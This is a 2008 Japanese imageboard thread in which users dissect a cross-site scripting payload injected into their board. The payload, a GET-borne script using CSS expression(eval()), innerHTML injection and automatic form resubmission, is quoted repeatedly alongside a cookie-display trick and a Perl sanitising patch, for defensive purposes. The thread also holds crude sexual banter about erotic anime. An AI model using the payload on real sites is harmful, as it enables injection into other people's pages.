あーやっとわかった(;´Д`)
　"http://(略)/bbs.cgi&渡したい物"
って事かぁ
普通の構文じゃないデスかぁー

えここのエロアニメが紙芝居だよ(;´Д`)

寝るか(;´Д`)ｼﾐ

こんな時間なのに38人もいるぜ

生き残りたい(;´Д`)生き残りたい

> 訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
> http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

個人指導はどうしようもないよね(;´Д`)個人差がありすぎる

参考：2008/09/27(土)05時32分34秒

はぁ(;´Д`)Shintani

> > つまりコードをGETで渡されてうかつにも実行しちゃったって事？
> ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

オキュメントって物があるのかもしれない！

参考：2008/09/27(土)05時32分16秒

> > つまりコードをGETで渡されてうかつにも実行しちゃったって事？
> ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
> 数字がでてたことになるね。
> でもコードが嫌に不完全なんだよね・・・ ocumentとか。

それは俺が加工する際に消しちゃっただけだよ(;´Д`)

参考：2008/09/27(土)05時32分16秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

表示件数が30だったらﾌﾆｬﾌﾆｬやって123件にする、ところの存在意味が
分からないのでどなたか説明ｷﾎﾞﾘ(;´Д`)

参考：2008/09/27(土)05時22分23秒

訴えた内容だけ見ると馬鹿かと思うけど講師の授業内容見てると多少は同情する面もあるな(;´Д`)
http://www.yomiuri.co.jp/e-japan/miyagi/news/20080925-OYT8T00083.htm

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> つまりコードをGETで渡されてうかつにも実行しちゃったって事？

ｔだとするならばXSS攻撃ってことになる上に、誰かが掲示板ろﾘﾛｰﾄﾞするたびに
数字がでてたことになるね。
でもコードが嫌に不完全なんだよね・・・ ocumentとか。

参考：2008/09/27(土)05時26分58秒

> > 俺も前まで勘違いしてたんだが
> > くずははCookie使ってないんだわ
> > ただ投稿時の名前を保持してるだけ
> まじで(;´Д`)

その状態でjavascript:alert(document.cookie);
ってｱﾄﾞﾚｽﾊﾞｰに入れてｴﾝﾀｰ押せば解りやすい

参考：2008/09/27(土)05時29分05秒

> > http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
> > こういうことです
> 出力はしてるけど投稿じゃないでしょ

つかなんでこれGETで出力されんの？(;´Д`)

参考：2008/09/27(土)05時30分01秒

> 例の妖怪はこっちでﾊﾞﾚﾊﾞﾚだったせいかりみくすを一斉に上げはじめた

この人何なの(;´Д`)

参考：2008/09/27(土)05時30分29秒

例の妖怪はこっちでﾊﾞﾚﾊﾞﾚだったせいかりみくすを一斉に上げはじめた

やぁ、おはよう(´ー｀;)

> > というかそうはなってないでしょ(;´Д`)
> > GETで投稿できたらどんな馬鹿掲示板だよそれ
> http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
> こういうことです

出力はしてるけど投稿じゃないでしょ

参考：2008/09/27(土)05時28分32秒

えここは朝から変態だなあ(;´Д`)

> > Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)
> 俺も前まで勘違いしてたんだが
> くずははCookie使ってないんだわ
> ただ投稿時の名前を保持してるだけ

まじで(;´Д`)

参考：2008/09/27(土)05時27分42秒

> > mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> > mm.document.forms[0].submit();
> > name=mmm+src=http://qwerty.on.arena.ne.jp
> > /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> > l=String.fromCharCode(60);
> > r=String.fromCharCode(62);
> > ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> > u.value+r;
> > document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> > }
> で、これが変数に見えるかね？

変数っていうかソースコードに見えます
実行して内部で乱数で数字作っているような

参考：2008/09/27(土)05時26分03秒

> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)ｷﾗｯ☆ﾐ

今起きた(;´Д`)U2がこんな時間に起きてるってどういうことよ

参考：2008/09/27(土)05時25分00秒

> > これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ
> というかそうはなってないでしょ(;´Д`)
> GETで投稿できたらどんな馬鹿掲示板だよそれ

http://qwerty.on.arena.ne.jp/cgi-bin/bbs.cgi?u=baka
こういうことです

参考：2008/09/27(土)05時26分47秒

> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)

俺も前まで勘違いしてたんだが
くずははCookie使ってないんだわ
ただ投稿時の名前を保持してるだけ

参考：2008/09/27(土)05時26分15秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

つまりコードをGETで渡されてうかつにも実行しちゃったって事？

参考：2008/09/27(土)05時22分23秒

しかしえここのｴﾛｱﾆﾒ転送はせっかくのｼｮﾀなのにたまにﾔｸｻﾞ声が聞こえてきて怖い(;´Д`)

> > ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> > GETの場合保持しない(表示しない)ってのがいいと思うが
> これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ

というかそうはなってないでしょ(;´Д`)
GETで投稿できたらどんな馬鹿掲示板だよそれ

参考：2008/09/27(土)05時24分56秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが

Cookieによるﾊﾝﾄﾞﾙ表示はやめるってことかね(;´Д`)

参考：2008/09/27(土)05時22分57秒

> > えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、
> mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
> mm.document.forms[0].submit();
> name=mmm+src=http://qwerty.on.arena.ne.jp
> /cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
> l=String.fromCharCode(60);
> r=String.fromCharCode(62);
> ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
> u.value+r;
> document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
> }

で、これが変数に見えるかね？

参考：2008/09/27(土)05時22分23秒

> ああ俺もクアッドほしいなあ(;´Д`)
> 転送したいなあ
> ｸｱｯﾄﾞ買おう

漏れもｸｱｯﾄﾞとかｵｸﾀとかほしいけど液晶ﾀﾌﾞﾚｯﾄもほしい(;´Д`)

参考：2008/09/27(土)05時22分53秒

> ああ眠い寝る
> 薬ぬんだ
> 寝る
> おやしみ(;´Д`)ｷﾗｯ☆ﾐ

ｲﾗｯ(;´Д`)

参考：2008/09/27(土)05時25分00秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> これはどうよ(;´Д`)
> http://d.hatena.ne.jp/tociyuki/20060923/1158984768

Jcode.pmに置き換えるのが簡単ならそれが一番ｽﾏｰﾄかな(;´Д`)

参考：2008/09/27(土)05時23分40秒

> まぁ今回のｱｲﾄﾞﾙﾗﾝｸｱｯﾌﾟはｽｸﾘﾌﾟﾄ投稿した香具師とえじじ！とﾑｷｰの絵描きだな(;´Д`)お疲れ様でした。

暫定対策しかしてない人より最終的にI_RCで対策考えた住人も評価しようよ(;´Д`)

参考：2008/09/27(土)05時19分28秒

ああ眠い寝る
薬ぬんだ
寝る
おやしみ(;´Д`)ｷﾗｯ☆ﾐ

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが

これが楽そうだな(;´Д`)GETで投稿受け付けなきゃいいんだ

参考：2008/09/27(土)05時22分57秒

> > ケチ(;´Д`)
> えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、

ほえ？
%3d が "=" の３文字になるの？(;´Д`)それとも=１文字？

参考：2008/09/27(土)05時16分48秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
> GETの場合保持しない(表示しない)ってのがいいと思うが

うん(;´Д`)でもそれだとｿｰｽの改変箇所が多くなりそうっつーか
現状どうなってるかが分からないので手を出したくなかった

参考：2008/09/27(土)05時22分57秒

> > 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない
> 綺麗にしてください(;´Д`)
> 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

これはどうよ(;´Д`)
http://d.hatena.ne.jp/tociyuki/20060923/1158984768

参考：2008/09/27(土)05時19分28秒

> > 綺麗にしてください(;´Д`)
> > 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> > 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)
> ツーか深海版ｿｰｽがないと修正してもどっかに問題でそう。
> 変数とか変に宣言しててぶつかって動かなくなりましたとか・・・

じゃあ$tmpじゃなくて$allyourbasearebelongtousとかにしておいてください(;´Д`)
まあﾃﾞｺｰﾄﾞ処理はたぶん手を加えてないだろうし
くずはのままなら独立したｻﾌﾞﾙｰﾁﾝだろうから問題ないんじゃね？

参考：2008/09/27(土)05時20分29秒

> > 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない
> 綺麗にしてください(;´Д`)
> 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

ぶっちゃけ一番簡単で効果的なのは名前欄やメール欄などを
GETの場合保持しない(表示しない)ってのがいいと思うが

参考：2008/09/27(土)05時19分28秒

ああ俺もクアッドほしいなあ(;´Д`)
転送したいなあ
ｸｱｯﾄﾞ買おう

> > ケチ(;´Д`)
> えー(;´Д`)じゃあﾋﾝﾖ : %3d は "="、

mmm.document.forms[0].v.value=Math.floor(Math.random()*65536);
mm.document.forms[0].submit();
name=mmm+src=http://qwerty.on.arena.ne.jp
/cgi-bin/bbs.cgi&count=if(document.forms[0].d.value==30){
l=String.fromCharCode(60);
r=String.fromCharCode(62);
ocument.getElementsByTagName(document.forms[0].i.value).item(1).innerHTML=l+document.forms[0].
u.value+r;
document.forms[0].d.value=123}&c=+style={a:expression(eval(document.forms[0].count.value))
}

参考：2008/09/27(土)05時16分48秒

これがうわさのやくざ声か(;´Д`)
初めて聞いた
怖すぎる

> > 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない
> 綺麗にしてください(;´Д`)
> 何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
> 深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

ツーか深海版ｿｰｽがないと修正してもどっかに問題でそう。
変数とか変に宣言しててぶつかって動かなくなりましたとか・・・

参考：2008/09/27(土)05時19分28秒

> まぁ今回のｱｲﾄﾞﾙﾗﾝｸｱｯﾌﾟはｽｸﾘﾌﾟﾄ投稿した香具師とえじじ！とﾑｷｰの絵描きだな(;´Д`)お疲れ様でした。

深海さんの本性もちょっと面白かった(;´Д`)

参考：2008/09/27(土)05時19分28秒

> > りみくすみたいな会話はやめろよ(;´Д`)
> > あとなんでいまさらURAを？
> ちなみに最初のほうでURAって書いた漏れは「う…うんまあ(;´Д`)そうとも言うかも」って
> ﾚｽしたあと呆然と成行を見ているよ(;´Д`)ｲﾝﾀｰﾈｯﾄって怖いところだなあ

2ﾚｽ目からはﾏｯﾁﾎﾟﾝﾌﾟっぽいな(;´Д`)災難ね

参考：2008/09/27(土)05時18分03秒

闘神伝URA

> > チコというから二十面相かと思ったらエロアニメだった(;´Д`)
> 二十面相はﾁｺからおじさん呼ばわりされて正直ちょっとｲﾗｯときてると思う(;´Д`)お兄さんだろって

おじさまだとちょっと勃起しちゃうけどな

参考：2008/09/27(土)05時19分01秒

> > 自己ﾚｽ
> > $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack ( "C", hex ( $1 ) )/eg;
> > &jcode'convert ( *value, 'sjis' );
> > の直後に以下のｺｰﾄﾞでとりあえず回避できるかな(;´Д`)
> > $&とかsubstr()とかﾁｮｰﾀﾞｻｲので何とかしたいけど眠いのでもういいや
> > my $tmp = $value;
> > $value = '';
> > while (length($tmp)) {
> >   if ($tmp =~ /^([\x09\x0A\x0D\x20-\x7E\xA1-\xDF]|[\x81-\x9F\xE0-\xEF][\x40-\x7E\x80-\xFC])+/) {
> >     $value = $&;
> >     substr($tmp,0,length($&)) = '';
> >   } else {
> >     substr($tmp,0,1) = '';
> >   }
> > }
> 確かにごり押しだな(;´Д`)ｽﾏｰﾄじゃない

綺麗にしてください(;´Д`)
何となくいったん別の文字ｺｰﾄﾞにしてから無効文字除去してまたsjisに戻るｺｰﾄﾞの方が綺麗になる気がする
深海さんと協力してﾌﾞﾗｯｼｭｱｯﾌﾟお願いします(;´Д`)

参考：2008/09/27(土)05時16分57秒

まぁ今回のｱｲﾄﾞﾙﾗﾝｸｱｯﾌﾟはｽｸﾘﾌﾟﾄ投稿した香具師とえじじ！とﾑｷｰの絵描きだな(;´Д`)お疲れ様でした。

> チコというから二十面相かと思ったらエロアニメだった(;´Д`)

二十面相はﾁｺからおじさん呼ばわりされて正直ちょっとｲﾗｯときてると思う(;´Д`)お兄さんだろって

参考：2008/09/27(土)05時17分37秒

> > まだ怒ってる(;´Д`)余程URAが気に入っている模様
> りみくすみたいな会話はやめろよ(;´Д`)
> あとなんでいまさらURAを？

ちなみに最初のほうでURAって書いた漏れは「う…うんまあ(;´Д`)そうとも言うかも」って
ﾚｽしたあと呆然と成行を見ているよ(;´Д`)ｲﾝﾀｰﾈｯﾄって怖いところだなあ

参考：2008/09/27(土)05時15分47秒